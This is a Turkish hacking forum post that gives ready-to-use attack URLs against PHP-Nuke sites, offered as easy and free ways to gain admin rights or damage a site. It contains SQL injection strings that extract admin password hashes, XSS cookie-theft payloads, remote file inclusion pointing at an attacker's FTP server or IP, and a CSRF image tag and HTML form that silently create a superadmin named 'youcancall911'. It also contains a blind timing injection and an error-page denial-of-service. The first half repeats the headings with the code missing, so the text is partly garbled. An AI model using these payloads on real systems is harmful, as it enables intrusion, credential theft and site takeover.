YoUcAnCall911
Kadim Dost
Arkadaşlar verildi mi bilmiyorum 17 sayfa başlık var verildi ise yeni seyler de ekleriz, değiştiririz birseyler yaparız. Benim hacke ilk başladıgım noktadır php acıkları...
Aşağıdaki kodları internet exlorerınızın adres cubuguna siteadı olan bölümü düzenleyerek yazdığınızda eger sitede acık varsa kolayca admin yetkilerine ulaşır ya da siteye zarar verirsiniz.. Denemesi kolay ve bedava...
Önizleme moduna saldırı
Kod:
Kod:
Sistemden cookie çalma bu yolla admin gibi login olabilirsiniz yada md5 hash ini crackliyebilirsiniz
Kod:
bu kod çalışmazsa geri tuşuna basın bidaha ileri tuşuna basın karşınıza admin id si ile md5 hash i gelicektir
"admin.php" yoluna ulaşmak
Kod:
bu tehlikeli açıklardan biridir phpnuke portalına belirlediğinz dosyalar eklenir adam girdiğinde o dosya yada kod bilgisayarınıza iner oto çalıştırılabilir
Kod:
cross site scripting le önemli bilgilere ulaşmak cookie hash vs.vs
Kod:
"modules.php" yardımıyla siteden bilgi çalma yönetim paneline login:
Kod:
cookie ayıklama kodundaki hatadan kaynaklanaan sitede herhangi bir script çalıştırılması yada istenilen kişinin cookie aracılıyla hash inin bulunması
Kod:
sql injection açığı
database modifiye edilmeye olanak verir admin eklenebilir ve önemli bilgilere ulaşılabilir hash özel mesja yoluyla alınır
Kod:
Admin oluşturma:
Kod:
Kullanıcı adı: youcancall911 şifre 911911 yapmak için yukarıdaki komutu kullanabilirsiniz.
image tagların arasına eklenicek kodla admin eklenmesi [.img]kod[./img] gibi
Kod:
Kullanıcı adı: youcancall911 şifre 911911 yapmak için yukarıdaki komutu kullanabilirsiniz. img taglarla belirlenmiş kod admin tarafından okunduğunda god admin olursunuz ve silinemezsiniz.
search engine açığı md5 e ulaşmak için:
yukardaki kodla etkilenmiş siteyi aşağıdaki kodla bi index.hrm hazırlayın ve sadece ona tıklamanız yeterli adminsiniz
Kendi yazdıklarıma ulaşamadığım için başka biryerden alıntı yaptım. Bilginize...
Aşağıdaki kodları internet exlorerınızın adres cubuguna siteadı olan bölümü düzenleyerek yazdığınızda eger sitede acık varsa kolayca admin yetkilerine ulaşır ya da siteye zarar verirsiniz.. Denemesi kolay ve bedava...
Önizleme moduna saldırı
Kod:
Kod:
http://www.siteninadı.com/phpnukeyolu/modules.php?name=Reviews&rop=Yes&title=f001&text=f002&score=9&[email protected]&reviewer=f00&score=9999
Kod:
Kod:
http://www.siteninadı.com/phpnukeyolu/modules.php?name=Reviews&rop=savecomment&id=1&uname=f00bar&score=999999999999999999999999
Sistemden cookie çalma bu yolla admin gibi login olabilirsiniz yada md5 hash ini crackliyebilirsiniz
Kod:
Kod:
http://www.siteninadı.com/phpnukeyolu/modules.php?name=Reviews&rop=postcomment&id='&title=a
"admin.php" yoluna ulaşmak
Kod:
Kod:
http://www.siteninadı.com/phpnukeyoluadmin/case/case.adminfaq.php/admin.php?op=FaqCatGo
http://www.siteninadı.com/phpnukeyolu/admin/admin.php/index.php
http://www.siteninadı.com/phpnukeyolu/admin/modules/blocks.php/admin.php
Kod:
Kod:
http://www.siteninadı.com/phpnukeyolu/index.php?modpath=ftp://ftpadresiniz.com/dizin/
http://www.siteninadı.com/phpnukeyolu/index.php?modpath=//saldırganın ip si/bilgisayardaki klasörün adı/
Kod:
Kod:
http://wwwsiteninadı.com/nukeyolu/modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=thread&order=[xss code here]&thold=0
http://www.siteninadı.com/nukeyolu/modules.phpname=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=thread&order=&thold=[xss code here]
http://www.siteninadı.com/nukeyolu/index.php?foo=bar%20union%20select%20<script>alert(document.cookie);</script>
http://www.siteninadı.com/nukeyolu/modules.php?name=Web_Links&l_op=viewlink&cid=1&show=foobar
Kod:
Kod:
http://www.siteninadı.com/nukeyolu/modules.php?name=Downloads&d_op=viewsdownload&sid=-1/**/UNION/**/SELECT/**/0,0,aid,pwd,0,0,0,0,0,0,0,0/**/FROM/**/nuke_authors/**/WHERE/**/radmins
uper=1/**/LIMIT/**/1/*
cookie ayıklama kodundaki hatadan kaynaklanaan sitede herhangi bir script çalıştırılması yada istenilen kişinin cookie aracılıyla hash inin bulunması
Kod:
Kod:
http://siteninadı.com/nukeyolu/index.php?user=MTo8c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmNvb2tpZSk7PC9zY3JpcHQ%2bZm9vYmFy
sql injection açığı
database modifiye edilmeye olanak verir admin eklenebilir ve önemli bilgilere ulaşılabilir hash özel mesja yoluyla alınır
Kod:
Kod:
http://www.siteninadı.com/nukeyolu/modules.php?name=Private_Messages&file=index&folder=inbox&user=eDpmb28nIFVOSU9OIFNFTEVDVCAyLG51bGwsMSwxLG51bGwvKjox
Kod:
Kod:
http://www.siteninadı.com/nukeyolu/admin.php?op=AddAuthor&add_aid=youcancall911&add_name=God&add_pwd=911911&[email protected]&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox
image tagların arasına eklenicek kodla admin eklenmesi [.img]kod[./img] gibi
Kod:
Kod:
[img]http://www.example.com/admin.php?op=AddAuthor&add_aid=youcancall911&add_name=God&add_pwd=911911 &[email protected]&add_radminsuper=1[/img]
Kullanıcı adı: youcancall911 şifre 911911 yapmak için yukarıdaki komutu kullanabilirsiniz. img taglarla belirlenmiş kod admin tarafından okunduğunda god admin olursunuz ve silinemezsiniz.
search engine açığı md5 e ulaşmak için:
Kod:
http://www.siteninadı.com/nukeyolu/search?q=Maty+Scripts%27UNION SELECT pwd from nuke_authors where name%3d%27God%27 AND IF(mid(pwd,1,1)%3d3,benchmark(150000,md5(1337)),1)/*"
[B]"error.php" açığı sitenin devamlı hata vermesini sağlar.[/B]
[code]http://www.siteninadı.com/phpyolu/error.php?newlang=dropby23
Kod:
<HTML>
<HEAD><TITLE>Error Manager sploit</TITLE>
</HEAD>
<BODY bgcolor="#000000" text="#FFFFFF">
<br><br><br>
<center>
<FORM action="http://www.sitebibadı.com/error.php" method="POST">
<input type="hidden" name="error" value="<img width='0' height='0' border='0'
src='http://www.victim.com/admin.php?op=AddAuthor&add_aid=youcancall911&add_name=God&add_pwd=911911&[email protected]&add_radminsuper=1'></img>404">
<input type="submit" value="Attack">
</FORM>
[B]Hata sayfası olarak bu kodu hazırlayın inde.htm ve adminin görmesini sağlayın ve adminsiniz [/B]
[B]Kullanıcı adı: youcancall911 şifre 911911 olacaktır. [/B]
</center>
<br><br><br>
</BODY>
</HTML>